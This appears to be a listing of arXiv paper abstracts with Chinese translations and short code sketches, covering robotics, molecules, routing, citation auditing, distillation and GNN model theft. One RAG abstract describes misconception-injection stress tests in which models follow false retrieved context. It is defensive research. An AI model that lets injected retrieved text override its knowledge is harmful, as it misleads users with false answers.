记忆对于长时程和历史依赖的机器人操作至关重要。这类任务通常涉及计数重复动作或操作暂时被遮挡的物体。最近的视觉-语言-动作(VLA)模型已开始融入记忆机制;然而,它们的评估仍局限于狭窄、非标准化的设置中。这限制了对记忆的系统理解、比较和进展测量。为应对这些挑战,我们引入了RoboMME:一个大规模标准化基准,用于评估和推进VLA模型在长时程、历史依赖场景中的表现。我们的基准包含16个操作任务,这些任务基于精心设计的分类法构建,该分类法评估时间、空间、对象和程序记忆。我们进一步开发了一套基于π0.5骨干网络的14种记忆增强VLA变体,以系统探索多种集成策略下的不同记忆表示。实验结果表明,记忆表示的有效性高度依赖于任务,每种设计在不同任务中都有独特的优势和局限性。视频和代码可在我们的网站https://robomme.github.io上找到。

英文摘要

Memory is critical for long-horizon and history-dependent robotic manipulation. Such tasks often involve counting repeated actions or manipulating objects that become temporarily occluded. Recent vision-language-action (VLA) models have begun to incorporate memory mechanisms; however, their evaluations remain confined to narrow, non-standardized settings. This limits systematic understanding, comparison, and progress measurement. To address these challenges, we introduce RoboMME: a large-scale standardized benchmark for evaluating and advancing VLA models in long-horizon, history-dependent scenarios. Our benchmark comprises 16 manipulation tasks constructed under a carefully designed taxonomy that evaluates temporal, spatial, object, and procedural memory. We further develop a suite of 14 memory-augmented VLA variants built on the π0.5 backbone to systematically explore different memory representations across multiple integration strategies. Experimental results show that the effectiveness of memory representations is highly task-dependent, with each design offering distinct advantages and limitations across different tasks. Videos and code can be found at our website https://robomme.github.io.

2412.18084 2026-05-27 cs.AI 版本更新

Property Enhanced Instruction Tuning for Multi-task Molecule Generation with Large Language Models

属性增强指令微调用于大型语言模型的多任务分子生成

Xuan Lin, Long Chen, Yile Wang, Yangyang Chen, Xiangxiang Zeng

发表机构 * School of Computer Science, Xiangtan University(湘潭大学计算机科学学院) College of Computer Science and Software Engineering, Shenzhen University(深圳大学计算机科学与软件工程学院) Department of Computer Science, University of Tsukuba(筑波大学计算机科学系) College of Computer Science and Electronic Engineering, Hunan University(湖南大学计算机科学与电子工程学院)

AI总结 提出PEIT框架,通过多模态对齐预训练和指令微调,提升LLM在分子描述、文本分子生成、属性预测和多约束分子生成任务上的性能。

Comments 9

详情
AI中文摘要

大型语言模型(LLMs)广泛应用于各种自然语言处理任务,如问答和机器翻译。然而,由于缺乏标记数据以及生化属性手动标注的困难,分子生成任务的性能仍然有限,尤其是涉及多属性约束的任务。在这项工作中,我们提出了一个两步框架PEIT(属性增强指令微调)来改进LLMs在分子相关任务上的表现。第一步,我们使用文本描述、SMILES和生化属性作为多模态输入,通过对齐多模态表示来合成指令数据,预训练一个名为PEIT-GEN的模型。第二步,我们使用合成数据微调现有的开源LLMs,得到的PEIT-LLM可以处理分子描述、基于文本的分子生成、分子属性预测以及我们新提出的多约束分子生成任务。实验结果表明,我们的预训练模型PEIT-GEN在分子描述任务上优于MolT5、BioT5、MolCA和Text+Chem-T5,证明了文本描述、结构和生化属性之间的模态对齐良好。此外,PEIT-LLM在多任务分子生成中显示出有希望的改进,证明了PEIT框架在分子任务中的有效性。代码和附录可在https://github.com/chenlong164/PEIT获取。

英文摘要

Large language models (LLMs) are widely applied in various natural language processing tasks such as question answering and machine translation. However, due to the lack of labeled data and the difficulty of manual annotation for biochemical properties, performance on molecule generation tasks is still limited, especially for tasks involving multi-property constraints. In this work, we present a two-step framework, PEIT (Property Enhanced Instruction Tuning), to improve LLMs for molecule-related tasks. In the first step, we use textual descriptions, SMILES, and biochemical properties as multimodal inputs to pre-train a model called PEIT-GEN, by aligning multimodal representations to synthesize instruction data. In the second step, we fine-tune existing open-source LLMs with the synthesized data; the resulting PEIT-LLM can handle molecule captioning, text-based molecule generation, molecular property prediction, and our newly proposed multi-constraint molecule generation tasks. Experimental results show that our pre-trained PEIT-GEN outperforms MolT5, BioT5, MolCA, and Text+Chem-T5 in molecule captioning, demonstrating that the modalities of textual descriptions, structures, and biochemical properties are well aligned. Furthermore, PEIT-LLM shows promising improvements in multi-task molecule generation, demonstrating the effectiveness of the PEIT framework for molecular tasks. The code and appendix are available at https://github.com/chenlong164/PEIT.

2603.12592 2026-05-27 cs.DS cs.AI cs.RO 版本更新

Early Pruning for Public Transport Routing

公共交通路由的早期剪枝

Andrii Rohovyi, Abdallah Abuaisha, Toby Walsh

发表机构 * Department of Computer Science and Engineering, University of New South Wales (UNSW), Sydney, NSW 2033, Australia(新南威尔士大学计算机科学与工程系) Department of Data Science and Artificial Intelligence, Monash University, Melbourne, Australia(莫纳什大学数据科学与人工智能系)

AI总结 提出早期剪枝技术,通过预排序换乘连接并在换乘循环中应用剪枝规则,在不影响最优性的情况下加速公共交通路由算法,实验表明查询时间最多减少57%。

详情
AI中文摘要

公共交通的路由算法,特别是广泛使用的RAPTOR及其变体,在支持无限换乘时,常常在换乘松弛阶段面临性能瓶颈,尤其是在密集的换乘图上。这种低效源于遍历许多潜在的站点间连接(步行、自行车、电动滑板车等)。为了保持可接受的性能,从业者通常限制换乘距离或排除某些换乘选项,这可能会降低路径的最优性并限制向旅客展示的多模式选项。本文介绍了早期剪枝,一种低开销的技术,可以在不影响最优性的情况下加速路由算法。通过按持续时间预排序换乘连接,并在换乘循环内应用剪枝规则,该方法在站点处丢弃较长的换乘,一旦它们无法产生比当前最佳解更早的到达时间。早期剪枝可以以最小的更改集成到现有代码库中,并且只需要一次预处理步骤。该技术在扩展准则设置中保持帕累托最优性,只要额外的优化准则在换乘持续时间上单调非递减。在多个基于RAPTOR的最新解决方案中,包括RAPTOR、ULTRA-RAPTOR、McRAPTOR、BM-RAPTOR、ULTRA-McRAPTOR和UBM-RAPTOR,并在瑞士和伦敦交通网络上测试,我们实现了高达57%的查询时间减少。该方法为交通路径查找算法的效率提供了可推广的改进。

英文摘要

Routing algorithms for public transport, particularly the widely used RAPTOR and its variants, often face performance bottlenecks during the transfer relaxation phase when supporting unlimited transfers, especially on dense transfer graphs. This inefficiency arises from iterating over many potential inter-stop connections (walks, bikes, e-scooters, etc.). To maintain acceptable performance, practitioners often limit transfer distances or exclude certain transfer options, which can reduce path optimality and restrict the multimodal options presented to travellers. This paper introduces Early Pruning, a low-overhead technique that accelerates routing algorithms without compromising optimality. By pre-sorting transfer connections by duration and applying a pruning rule within the transfer loop, the method discards longer transfers at a stop once they cannot yield an earlier arrival than the current best solution. Early Pruning can be integrated with minimal changes to existing codebases and requires only a one-time preprocessing step. The technique preserves Pareto-optimality in extended-criteria settings whenever the additional optimization criteria are monotonically non-decreasing in transfer duration. Across multiple state-of-the-art RAPTOR-based solutions (RAPTOR, ULTRA-RAPTOR, McRAPTOR, BM-RAPTOR, ULTRA-McRAPTOR, and UBM-RAPTOR), tested on the Switzerland and London transit networks, we achieve query time reductions of up to 57%. This approach provides a generalizable improvement to the efficiency of transit pathfinding algorithms.
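The pre-sort and pruning rule described above can be sketched as follows. This is a minimal illustration, not the authors' implementation: the function names, the data layout, and the reading of "current best solution" as the best known arrival time at the target stop are all assumptions made here.

```python
from typing import Dict, Iterable, List, Set, Tuple

INF = float("inf")
Transfer = Tuple[str, int]  # (destination stop, transfer duration)


def presort_transfers(transfers: Dict[str, List[Transfer]]) -> Dict[str, List[Transfer]]:
    """One-time preprocessing: sort each stop's transfers by ascending duration."""
    return {stop: sorted(edges, key=lambda e: e[1]) for stop, edges in transfers.items()}


def relax_transfers(marked_stops: Iterable[str], arrival: Dict[str, float],
                    sorted_transfers: Dict[str, List[Transfer]], target: str) -> Set[str]:
    """Relax transfers from the marked stops, pruning as soon as one is too long.

    Assumption: the pruning bound is the best known arrival time at `target`.
    """
    improved: Set[str] = set()
    # Snapshot departure times so transfers are not chained within one round.
    base = {stop: arrival[stop] for stop in marked_stops}
    for stop, t0 in base.items():
        for dest, duration in sorted_transfers.get(stop, []):
            candidate = t0 + duration
            if candidate >= arrival.get(target, INF):
                break  # every remaining transfer from this stop is at least as long
            if candidate < arrival.get(dest, INF):
                arrival[dest] = candidate
                improved.add(dest)
    return improved
```

The `break` is what the sorted order buys: without sorting, each transfer would need its own comparison and the loop could only `continue`.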

2605.16000 2026-05-27 cs.SI cs.AI cs.DL 版本更新

CitePrism: Human-in-the-Loop AI for Citation Auditing and Editorial Integrity

CitePrism:面向引文审计与编辑完整性的人机协同AI

Gowrika Mahesh, Budanur Madappa Darshan Gowda, Kavana Gopladevarahalli Papegowda, Prajwal Basavaraj, Binh Vu, Swati Chandna, Mehrdad Jalali

发表机构 * GitHub

AI总结 提出CitePrism框架,结合LLM推理、嵌入相似度、元数据验证和人工审核,实现稿件级引文审计,初步验证显示可辅助编辑筛选不相关引文。

Comments 30 pages, 5 main figures, 3 tables, appendices with interface screenshots and implementation details; pilot-stage framework and single-manuscript validation study

详情
AI中文摘要

编辑和审稿人应确保稿件引用相关、准确、最新且符合伦理的文献,但稿件级引文审计目前仍主要依赖人工、分散且难以规模化。引文上下文、元数据质量、自引模式和书目完整性都会影响参考文献是否恰当支持局部主张。我们提出CitePrism,一个透明的混合决策支持框架,用于编辑引文审计,它结合了LLM辅助的上下文推理、基于嵌入的语义相似性、元数据验证、完整性标志和人机协同的分析师审查。CitePrism提取引文邻域、丰富参考文献元数据、计算融合相关性分数、呈现元数据和自引审查提示,并支持可配置的阈值分类。在针对一篇包含104条参考文献的路面工程案例稿件的初步验证中,与人工二元相关性标签的一致性达到Cohen's kappa = 0.429。在操作阈值tau=17时,CitePrism标记了所有人工标记为不相关的引文,同时也产生了需要分析师审查的误报。这些结果表明CitePrism可能支持保守的编辑筛选和引文质量分类,但并未确立通用的编辑性能。CitePrism旨在作为试点阶段的决策支持,而非自主的不端行为检测器或自动化编辑决策系统。在操作使用前,需要在稿件、领域、标注者、基线和部署设置中进行更广泛的验证。

英文摘要

Editors and reviewers are expected to ensure that manuscripts cite relevant, accurate, current, and ethically appropriate literature, yet manuscript-level citation auditing remains largely manual, fragmented, and difficult to scale. Citation context, metadata quality, self-citation patterns, and bibliographic integrity all affect whether a reference appropriately supports a local claim. We present CitePrism, a transparent hybrid decision-support framework for editorial citation auditing that combines LLM-assisted contextual reasoning, embedding-based semantic similarity, metadata verification, integrity-oriented flags, and human-in-the-loop analyst review. CitePrism extracts citation neighborhoods, enriches reference metadata, computes fused relevance scores, surfaces metadata and self-citation review prompts, and supports configurable threshold-based triage. In a preliminary validation on a single case-study manuscript with 104 references from pavement engineering, agreement with human binary relevance labels reached Cohen's kappa = 0.429. At operating threshold tau = 17, CitePrism flagged all human-labeled irrelevant citations, while also producing false positives requiring analyst review. These results suggest that CitePrism may support conservative editorial screening and citation-quality triage, but they do not establish general editorial performance. CitePrism is intended as pilot-stage decision support, not as an autonomous misconduct detector or automated editorial decision system. Broader validation across manuscripts, domains, annotators, baselines, and deployment settings is required before operational use.
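The agreement statistic reported above, Cohen's kappa, corrects raw agreement for the agreement expected by chance. The sketch below shows the standard computation for two label sequences; the function name and the toy labels in the usage note are illustrative and unrelated to the study's data.

```python
from typing import Hashable, Sequence


def cohens_kappa(labels_a: Sequence[Hashable], labels_b: Sequence[Hashable]) -> float:
    """Cohen's kappa: (p_o - p_e) / (1 - p_e) for two raters over the same items."""
    if len(labels_a) != len(labels_b) or not labels_a:
        raise ValueError("label sequences must be non-empty and of equal length")
    n = len(labels_a)
    # Observed agreement: share of items on which both raters agree.
    p_o = sum(a == b for a, b in zip(labels_a, labels_b)) / n
    # Chance agreement: product of each rater's marginal rate, summed over categories.
    categories = set(labels_a) | set(labels_b)
    p_e = sum((list(labels_a).count(c) / n) * (list(labels_b).count(c) / n)
              for c in categories)
    if p_e == 1.0:
        return float("nan")  # undefined when both raters use a single identical label
    return (p_o - p_e) / (1.0 - p_e)
```

For example, `cohens_kappa([1, 1, 0, 0], [1, 0, 0, 0])` has observed agreement 0.75 and chance agreement 0.5, giving kappa 0.5. On the commonly used Landis and Koch scale, the reported 0.429 falls in the "moderate" band (0.41 to 0.60).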

2605.15850 2026-05-27 cs.CY cs.AI cs.HC 版本更新

Access Timing as Scaffolding: A Reinforcement Learning Approach to GenAI in Education

访问时机作为脚手架:一种强化学习方法在生成式AI教育中的应用

Janne Rotter, Pau Benazet i Montobbio, Davinia Hernández-Leo

发表机构 * Universitat Pompeu Fabra(庞培法华大学)

AI总结 本研究通过强化学习智能体控制生成式AI的访问时机,基于元认知理论、认知负荷理论和生产性失败设计奖励函数,实验证明策略性定时访问相比无限制和完全限制使用能提高学习效果和元认知准确性。

详情
AI中文摘要

近年来,生成式AI(GenAI)在教育环境中的应用已成为大学生日常生活中的普遍现象,尽管它有可能在不受限制地使用时导致过度依赖、元认知脱离和学习效果下降。虽然大多数先前研究关注如何从教学法上脚手架其使用,但何时允许使用现成的GenAI这一问题仍未被充分研究,且缺乏基于教学法的实证调查。我们将访问时机本身视为一种隐式脚手架,并通过强化学习(RL)智能体来操作化它,该智能体决定学生何时应访问GenAI,其奖励函数基于元认知理论、认知负荷理论和生产性失败。在一项包含105名高等教育学生的混合方法对照实验室研究中,我们比较了该智能体对学习收益和元认知参与的影响,与无限制和完全限制使用的情况进行对比。结果表明,在强化学习条件下,策略性定时的GenAI访问相比无限制访问改善了客观后测表现和元认知准确性,同时相比完全限制减少了任务错误和任务时间,从而在没有显式元认知提示或结构化脚手架的情况下优于这两种方法。然而,在自我报告的元认知意识方面没有出现条件间的差异。因此,GenAI访问的时机是一种可处理、有理论基础且可扩展的教学策略,优于完全无限制和完全限制的访问,与现成工具兼容且可能具有较低的采用障碍。这开辟了一个新的研究领域,探索教育者如何促进访问时机以及在人类-AI学习系统设计中实现它。

英文摘要

In recent years, generative AI (GenAI) in educational settings has become ubiquitous in university students' daily lives, despite its potential to induce over-reliance, metacognitive disengagement, and diminished learning when used without restriction. While most prior research has focused on how to pedagogically scaffold its usage, the question of when to allow off-the-shelf GenAI remains understudied and lacks pedagogically grounded empirical investigation. We treat access timing itself as a form of implicit scaffolding and operationalize it through a reinforcement learning (RL) agent that decides when students should access GenAI, with a reward function grounded in metacognitive theory, cognitive load theory, and productive failure. In a mixed-methods controlled lab study with N=105 higher education students, we compared the agent's effect on learning gains and metacognitive engagement to unrestricted and fully restricted use. Results show that strategically timed GenAI access under the reinforcement learning condition improved objective post-test performance and metacognitive accuracy compared with unrestricted access, while reducing task errors and time on task relative to complete withholding, thus outperforming both approaches without the need for explicit metacognitive prompts or structured scaffolding. However, no between-condition differences emerged on self-reported metacognitive awareness. Overall, the timing of GenAI access is a tractable, theoretically grounded, and scalable pedagogical strategy that improves on both completely unrestricted and fully withheld access; it is compatible with off-the-shelf tools and potentially has a low adoption barrier. This opens up a new research area that explores how access timing can be facilitated by educators and implemented in human-AI learning system design.

2605.14473 2026-05-27 cs.CL cs.AI 版本更新

Does RAG Know When Retrieval Is Wrong? Diagnosing Context Compliance under Knowledge Conflict

RAG 能知道检索错误吗?知识冲突下的上下文合规性诊断

Yihang Chen, Pin Qian, Su Wang, Sipeng Zhang, Huan Xu, Shuhuai Lin, Xinpeng Wei

发表机构 * Georgia Institute of Technology(佐治亚理工学院) Carnegie Mellon University(卡内基梅隆大学) University of California San Diego(加州大学圣地亚哥分校)

AI总结 提出上下文驱动分解(CDD)方法,在推理时探测并干预检索增强生成中的上下文与参数知识冲突,揭示上下文合规性模式并提升鲁棒性。

Comments 12 pages, 4 figures, 3 tables

详情
AI中文摘要

检索增强生成(RAG)中的上下文合规机制发生在检索到的上下文主导最终答案时,即使它与模型的参数化知识冲突。仅凭准确性并不能揭示在这种冲突下检索到的上下文如何因果性地塑造答案。我们引入了上下文驱动分解(CDD),这是一种在推理时运行的信念分解探针,并作为受控检索冲突的干预机制。通过跨Epi-Scale压力测试、TruthfulQA错误概念注入和跨模型重复实验,CDD揭示了三种模式。P1:上下文合规性在对抗性上界设置中是可测量的,标准RAG在TruthfulQA错误概念注入(N=500)上达到15.0%的准确率。P2:对抗性准确率提升跨模型家族迁移——CDD提高了Gemini-2.5-Flash以及Claude Haiku/Sonnet/Opus的准确率——但理由-答案因果耦合不迁移。CDD在Gemini-2.5-Flash上达到64.1%的错误注入因果敏感性,而所有三种Claude变体的敏感性落在[-3%, +7%]范围内,表明Claude侧的准确率提升通过一种与显式冲突解决轨迹不同的机制运作。P3:显式冲突分解提高了时间漂移和噪声干扰下的鲁棒性,CDD在完整Epi-Scale对抗性基准上对时间偏移达到71.3%,对干扰证据达到69.9%。这三种模式将上下文合规性识别为一个结构轴,沿此轴可以对标准RAG进行探测和干预,区别于检索质量或单一方法鲁棒性问题,并激励发布Epi-Scale以跨模型家族和检索管道进行系统研究。

英文摘要

The Context-Compliance Regime in Retrieval-Augmented Generation (RAG) occurs when retrieved context dominates the final answer even when it conflicts with the model's parametric knowledge. Accuracy alone does not reveal how retrieved context causally shapes answers under such conflict. We introduce Context-Driven Decomposition (CDD), a belief-decomposition probe that operates at inference time and serves as an intervention mechanism for controlled retrieval conflict. Across Epi-Scale stress tests, TruthfulQA misconception injection, and cross-model reruns, CDD exposes three patterns. P1: context compliance is measurable in an upper-bound adversarial setting, where Standard RAG reaches 15.0% accuracy on TruthfulQA misconception injection (N=500). P2: adversarial accuracy gains transfer across model families -- CDD improves accuracy on Gemini-2.5-Flash and on Claude Haiku/Sonnet/Opus -- but rationale-answer causal coupling does not transfer. CDD reaches 64.1% mistake-injection causal sensitivity on Gemini-2.5-Flash, while sensitivities for all three Claude variants fall in the [-3%, +7%] range, suggesting that the Claude-side accuracy gains operate through a mechanism distinct from the explicit conflict-resolution trace. P3: explicit conflict decomposition improves robustness under temporal drift and noisy distractors, with CDD reaching 71.3% on temporal shifts and 69.9% on distractor evidence on the full Epi-Scale adversarial benchmark. These three patterns identify context-compliance as a structural axis along which standard RAG can be probed and intervened on, distinct from retrieval-quality or single-method robustness questions, and motivate releasing Epi-Scale for systematic study across model families and retrieval pipelines.

2605.11651 2026-05-27 cs.CV cs.AI cs.CL 版本更新

Hide to See: Reasoning-prefix Masking for Visual-anchored Thinking in VLM Distillation

Hide to See: 面向VLM蒸馏中视觉锚定思维的推理前缀掩码

Seonghoon Yu, Dongjun Nam, Byung-Kwan Lee, Jeany Son

发表机构 * KAIST(韩国科学技术院) NVIDIA(英伟达) POSTECH(浦项科技大学)

AI总结 提出一种推理前缀掩码蒸馏框架,通过掩码学生模型的显著推理前缀,迫使其在推理过程中更依赖视觉证据,从而缓解长推理轨迹中的视觉遗忘问题,提升多模态推理性能。

Comments Pre-print

详情
AI中文摘要

近期VLM中的思考-回答方法(如Qwen3-VL-Thinking)通过在最终答案前利用中间推理步骤来提升推理性能,但其计算成本显著增加,尤其是对于较大的VLM。为了将这种能力蒸馏到紧凑的思考-回答VLM中,一个主要目标是提高学生在整个推理轨迹中利用视觉证据的能力,因为长思考-回答轨迹存在视觉遗忘问题。为此,我们引入了一种新颖的思考-回答蒸馏框架,通过掩码学生模型的显著推理前缀,鼓励学生将思考锚定在视觉信息上。为了补偿这种被掩码的文本线索,学生在蒸馏过程中被鼓励更多地依赖视觉证据作为替代信息源。我们的掩码策略包括:1)逐token的显著推理前缀掩码,针对每个下一token预测选择性掩码高影响力的推理前缀;2)自调节掩码预算调度,根据教师-学生分布之间的差异(即蒸馏难度)逐渐增加掩码规模。在蒸馏阶段,学生模型由我们的显著推理前缀掩码引导,该掩码同时阻塞未来token和显著推理线索,替代了自回归语言建模中使用的标准因果掩码。实验结果表明,我们的方法在多模态推理基准上优于最近的开源VLM、VLM蒸馏和自蒸馏方法,进一步分析证实了学生思考过程中视觉利用的增强。

英文摘要

Recent think-answer approaches in VLMs, such as Qwen3-VL-Thinking, boost reasoning performance by leveraging intermediate thinking steps before the final answer, but their computational cost becomes substantial, especially for larger VLMs. To distill such capabilities into compact think-answer VLMs, a primary objective is to improve the student's ability to utilize visual evidence throughout its reasoning trace, as long think-answer traces suffer from visual forgetting. To this end, we introduce a novel think-answer distillation framework that encourages the student to anchor its thinking on visual information by masking the student's salient reasoning prefixes. To compensate for the masked textual cues, the student is encouraged to rely more on visual evidence as an alternative source of information during distillation. Our masking strategies include: 1) token-wise salient reasoning-prefix masking, which selectively masks high-influence reasoning prefixes for each next-token prediction, and 2) self-paced masking budget scheduling, which gradually increases the masking scale according to distillation difficulty, measured by the discrepancy between the teacher and student distributions. In the distillation phase, the student is guided by our salient reasoning-prefix mask, which blocks both future tokens and salient reasoning cues, in place of the standard causal mask used for auto-regressive language modeling. Experimental results show that our approach outperforms recent open-source VLMs, VLM distillation, and self-distillation methods on multimodal reasoning benchmarks, while further analyses confirm enhanced visual utilization along the student's thinking process.
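The mask described above, one that blocks future tokens as a causal mask does and additionally hides salient reasoning-prefix tokens per prediction step, can be sketched as a boolean matrix. This is a toy illustration under stated assumptions: the saliency scores are taken as given (the abstract does not say how they are computed), `reasoning_start` marks where reasoning tokens begin after the visual and prompt tokens, and a fixed top-`budget` rule stands in for the paper's self-paced schedule.

```python
from typing import List, Sequence


def build_prefix_mask(salience: Sequence[Sequence[float]],
                      reasoning_start: int, budget: int) -> List[List[bool]]:
    """Return mask[i][j] == True where position i may attend to position j.

    Starts from a causal mask, then for each row i hides the `budget` most
    salient earlier reasoning tokens (positions reasoning_start .. i-1).
    Tokens before `reasoning_start` (e.g. visual tokens) always stay visible.
    """
    n = len(salience)
    mask = [[j <= i for j in range(n)] for i in range(n)]  # standard causal mask
    for i in range(n):
        candidates = list(range(reasoning_start, i))  # earlier reasoning tokens only
        hidden = sorted(candidates, key=lambda j: salience[i][j], reverse=True)[:budget]
        for j in hidden:
            mask[i][j] = False
    return mask
```

With `budget=0` the function reduces to the ordinary causal mask, which makes it easy to ramp the masking scale up gradually during training.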

2605.13779 2026-05-27 cs.LG cs.AI cs.DC 版本更新

MinT: Managed Infrastructure for Training and Serving Millions of LLMs

MinT:用于训练和服务数百万LLM的托管基础设施

Mind Lab: Song Cao, Vic Cao, Andrew Chen, Kaijie Chen, Cleon Cheng, Steven Chiang, Kaixuan Fan, Hera Feng, Huan Feng, Arthur Fu, Jun Gao, Hongquan Gu, Aaron Guan, Nolan Ho, Mutian Hong, Hailee Hou, Peixuan Hua, Charles Huang, Miles Jiang, Nora Jiang, Yuyi Jiang, Qiuyu Jin, Fancy Kong, Andrew Lei, Kyrie Lei, Alexy Li, Lucian Li, Ray Li, Theo Li, Zhihui Li, Jiayi Lin, Kairus Liu, Kieran Liu, Logan Liu, Xiang Liu, Irvine Lu, Maeve Luo, Runze Lv, Pony Ma, Verity Niu, Anson Qiu, Vincent Wang, Rio Yang, Maxwell Yao, Carrie Ye, Regis Ye, Wenlin Ye, Josh Ying, Danney Zeng, Yuhan Zhan, Anya Zhang, Di Zhang, Ruijia Zhang, Sueky Zhang, Ya Zhang, Wei Zhao, Ada Zhou, Changhai Zhou, Yuhua Zhou, Xinyue Zhu, Murphy Zhuang

发表机构 * Mind Lab

AI总结 提出MinT系统,通过LoRA适配器管理实现大规模基础模型上的高效训练与在线服务,支持百万级策略目录。

Comments 30 pages, technical report

详情
AI中文摘要

我们提出MindLab Toolkit (MinT),一个用于低秩适配(LoRA)后训练和在线服务的托管基础设施系统。MinT针对这样一种场景:在少量昂贵的基模型部署上产生许多训练好的策略。MinT不是将每个策略实现为合并的完整检查点,而是保持基模型驻留,并让导出的LoRA适配器修订版依次经过采样(rollout)、更新、导出、评估、服务和回滚等阶段,将分布式训练、服务、调度和数据移动隐藏在服务接口后面。MinT沿三个维度扩展此路径。Scale Up将LoRA RL扩展到前沿规模的密集和MoE架构,包括MLA和DSA注意力路径,训练和服务已在超过1T总参数的规模上得到验证。Scale Down仅移动导出的LoRA适配器,在秩1设置中可小于基模型大小的1%;仅移交适配器使实测步骤耗时在4B密集模型上减少18.3倍,在30B MoE上减少2.85倍,而并发多策略GRPO将挂钟时间缩短1.77倍和1.45倍,且不提高峰值内存。Scale Out将持久策略可寻址性与CPU/GPU工作集分离:张量并行部署支持10^6规模的可寻址目录(单引擎扫描实测至100K)和集群规模的千适配器活动波,冷加载作为计划的服务工作处理,打包的MoE LoRA张量将实时引擎加载提高8.5-8.7倍。因此,MinT管理百万规模的LoRA策略目录,同时在共享的1T级基模型上训练和服务选定的适配器修订版。

英文摘要

We present MindLab Toolkit (MinT), a managed infrastructure system for Low-Rank Adaptation (LoRA) post-training and online serving. MinT targets a setting where many trained policies are produced over a small number of expensive base-model deployments. Instead of materializing each policy as a merged full checkpoint, MinT keeps the base model resident and moves exported LoRA adapter revisions through rollout, update, export, evaluation, serving, and rollback, hiding distributed training, serving, scheduling, and data movement behind a service interface. MinT scales this path along three axes. Scale Up extends LoRA RL to frontier-scale dense and MoE architectures, including MLA and DSA attention paths, with training and serving validated beyond 1T total parameters. Scale Down moves only the exported LoRA adapter, which can be under 1% of base-model size in rank-1 settings; adapter-only handoff reduces the measured step by 18.3x on a 4B dense model and 2.85x on a 30B MoE, while concurrent multi-policy GRPO shortens wall time by 1.77x and 1.45x without raising peak memory. Scale Out separates durable policy addressability from CPU/GPU working sets: a tensor-parallel deployment supports 10^6-scale addressable catalogs (measured single-engine sweeps through 100K) and thousand-adapter active waves at cluster scale, with cold loading treated as scheduled service work and packed MoE LoRA tensors improving live engine loading by 8.5-8.7x. MinT thus manages million-scale LoRA policy catalogs while training and serving selected adapter revisions over shared 1T-class base models.
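The claim that a rank-1 adapter can be under 1% of base-model size follows from how LoRA is parameterized: a weight matrix of shape `d_out x d_in` gets two low-rank factors with `r * (d_in + d_out)` parameters in total. The arithmetic below is a sketch for a single adapted matrix; the 4096 x 4096 shape is an illustrative assumption, and which matrices MinT actually adapts is not stated in the abstract.

```python
def lora_params(d_out: int, d_in: int, rank: int) -> int:
    """Parameters in LoRA factors B (d_out x rank) and A (rank x d_in)."""
    return rank * (d_in + d_out)


def lora_fraction(d_out: int, d_in: int, rank: int) -> float:
    """Adapter size relative to the dense weight it adapts."""
    return lora_params(d_out, d_in, rank) / (d_out * d_in)


if __name__ == "__main__":
    # Hypothetical 4096 x 4096 projection with a rank-1 adapter.
    print(lora_params(4096, 4096, 1))    # 8192
    print(lora_fraction(4096, 4096, 1))  # 0.00048828125, i.e. about 0.05%
```

Since the fraction scales as `rank * (d_in + d_out) / (d_in * d_out)`, it shrinks as the matrices grow, which is why moving only the adapter becomes more attractive at larger base-model sizes.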

2605.12827 2026-05-27 cs.CR cs.AI cs.LG 版本更新

GraphIP-Bench: How Hard Is It to Steal a Graph Neural Network, and Can We Stop It?

GraphIP-Bench:窃取图神经网络有多难,我们能阻止吗?

Kaixiang Zhao, Bolin Shen, Yuyang Dai, Shayok Chakraborty, Yushun Dong

发表机构 * University of Notre Dame(圣母大学) Florida State University(佛罗里达州立大学) University of California, Berkeley(加州大学伯克利分校)

AI总结 提出统一基准GraphIP-Bench,集成12种提取攻击和12种防御,评估图神经网络模型窃取的难易程度及防御有效性,发现中等查询预算下窃取容易且多数防御无效,异配图更难窃取。

Comments Under review

详情
AI中文摘要

作为云服务部署的图神经网络(GNN)可能通过模型提取攻击被窃取,这种攻击从查询响应中训练替代模型以复制目标行为,而越来越多的所有权防御试图防止或追踪此类窃取。本文提出两个问题:窃取GNN有多难,我们能阻止吗?先前的工作无法回答这两个问题,因为实验使用了不一致的数据集、威胁模型和指标。我们引入GraphIP-Bench,一个统一的基准,在单一黑盒协议下评估双方。GraphIP-Bench集成了十二种提取攻击、十二种防御(涵盖水印、输出扰动和查询模式检测)、十个公共图(涵盖同配、异配和大规模场景)、三种GNN骨干网络和三种图学习任务。它报告了在共享划分、查询和预算下的保真度、任务效用、所有权验证和计算成本。我们进一步增加了一个联合攻击与防御赛道,对每个受防御目标运行每种攻击,并测量结果替代模型上的水印验证,揭示了防御在提取后保留了多少保护。实证结果清晰:在中等查询预算下窃取GNN很容易,大多数防御并未改变这一点;几种水印在受保护模型上可靠验证,但在提取的替代模型上失去了大部分验证信号,暴露了单模型评估忽略的差距;异配图系统性地更难窃取,而目标与替代模型之间的跨架构不匹配减少了但并未阻止提取。我们发布了GraphIP-Bench,附带可复现的脚本和配置,并将攻击和防御集成到PyGIP库中。代码:https://github.com/LabRAI/GraphIP-Bench。库:https://labrai.github.io/PyGIP/index.html。

英文摘要

Graph neural networks (GNNs) deployed as cloud services can be stolen through model-extraction attacks, which train a surrogate from query responses to reproduce the target's behavior, and a growing line of ownership defenses tries to prevent or trace such theft. This paper asks two questions: how hard is it to steal a GNN, and can we stop it? Prior work cannot answer either, because experiments use inconsistent datasets, threat models, and metrics. We introduce GraphIP-Bench, a unified benchmark that evaluates both sides under a single black-box protocol. GraphIP-Bench integrates twelve extraction attacks, twelve defenses spanning watermarking, output perturbation, and query-pattern detection, ten public graphs covering homophilic, heterophilic, and large-scale regimes, three GNN backbones, and three graph-learning tasks. It reports fidelity, task utility, ownership verification, and computational cost on shared splits, queries, and budgets. We further add a joint attack-and-defense track that runs every attack on every defended target and measures watermark verification on the resulting surrogate, exposing how much protection a defense retains after extraction. The empirical picture is clear: stealing a GNN is easy at medium query budgets and most defenses do not change this; several watermarks verify reliably on the protected model but lose most of their verification signal on the extracted surrogate, exposing a gap that single-model evaluations miss; and heterophilic graphs are systematically harder to steal, while a cross-architecture mismatch between target and surrogate reduces but does not prevent extraction. We release GraphIP-Bench with reproducible scripts and configurations, and integrate the attacks and defenses into the PyGIP library. Code: https://github.com/LabRAI/GraphIP-Bench. Library: https://labrai.github.io/PyGIP/index.html.
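Two of the reported quantities, fidelity and task utility, are easy to confuse. The sketch below uses the definitions common in the model-extraction literature: fidelity as the rate at which the surrogate's predictions match the target's, and utility as ordinary accuracy against ground-truth labels. These definitions and the function names are assumptions for illustration; the benchmark's exact metric definitions are not given in the abstract, and nothing here uses the PyGIP API.

```python
from typing import Hashable, Sequence


def agreement_rate(xs: Sequence[Hashable], ys: Sequence[Hashable]) -> float:
    """Fraction of positions at which two prediction sequences agree."""
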